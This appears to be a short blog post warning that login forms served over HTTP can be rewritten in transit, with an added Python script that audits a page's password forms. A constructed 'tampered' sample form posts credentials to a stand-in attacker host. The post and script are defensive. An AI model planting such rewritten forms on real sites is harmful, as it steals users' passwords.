TaciturnSun 23 Sep 2007
Transmitting passwords over HTTPS is safe, but serving the login form itself over HTTP is not. The attack vector is that an active attacker (anyone who can modify the unauthenticated HTTP response, such as someone on the same wireless network or an intermediate router) can send the user a custom login form whose submission address points at a server the attacker controls, or inject a script that copies the password before the real submission. The user sees no warning: the form looks identical, and the HTTPS submission only protects the password on its way to wherever the form said to send it. I noticed this when using the Debian mentors login. Fortunately the login page is also available over HTTPS if you adjust the URI yourself, but ideally it would be the default.
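The check below is an added example, not code from the original post or from the Debian mentors site. It parses a login page and flags the three things that matter here: whether the page was served over HTTPS at all, whether each password form submits over HTTPS, and whether it submits to the same host. The HTML snippets are constructed for the example and the hostnames (mentors.example.org, evil.example.net) are hypothetical; the "tampered" page shows what an active attacker's rewritten form looks like.

```python
"""Added example: audit a fetched login page for the form-over-HTTP
problem. Pure standard library; the sample pages below are constructed
and the hostnames are hypothetical."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect (action, has_password_field) for every <form> on the page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = [attrs.get("action") or "", False]
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def audit_login_page(page_url, html):
    """Return a list of findings (strings) for the password forms on a page.

    An empty list means the page came over HTTPS and every password form
    submits over HTTPS to the same host as the page."""
    findings = []
    page = urlsplit(page_url)
    if page.scheme != "https":
        # The form itself travelled in the clear, so an active attacker can
        # replace it wholesale; nothing checked below can be trusted.
        findings.append("login page served over %s, not https" % page.scheme)
    parser = _FormCollector()
    parser.feed(html)
    for action, has_password in parser.forms:
        if not has_password:
            continue
        # Relative actions resolve against the page URL, as the browser does.
        target = urlsplit(urljoin(page_url, action))
        if target.scheme != "https":
            findings.append("password form submits over %s to %s"
                            % (target.scheme, target.geturl()))
        if target.hostname != page.hostname:
            findings.append("password form submits to a different host: %s"
                            % target.hostname)
    return findings


# Constructed sample: what the site serves today (form over HTTP, action HTTPS).
ORIGINAL_PAGE = """
<form method="post" action="https://mentors.example.org/login">
  <input name="user"><input type="password" name="pass">
</form>"""

# Constructed sample: the same page after an active attacker rewrote the
# action in transit; the user cannot tell the difference.
TAMPERED_PAGE = """
<form method="post" action="http://evil.example.net/steal">
  <input name="user"><input type="password" name="pass">
</form>"""

# Constructed sample: the fix, the whole page served over HTTPS.
FIXED_PAGE = ORIGINAL_PAGE


if __name__ == "__main__":
    for label, url, html in [
        ("original", "http://mentors.example.org/login", ORIGINAL_PAGE),
        ("tampered", "http://mentors.example.org/login", TAMPERED_PAGE),
        ("fixed", "https://mentors.example.org/login", FIXED_PAGE),
    ]:
        print(label, audit_login_page(url, html) or "ok")
```

The first finding is the important one: once the page itself arrives over HTTP, the other two checks only tell you what the attacker chose to change, not whether the page was changed. Running the audit against the HTTPS variant of the same URL is the quick way to confirm a site offers the safe version.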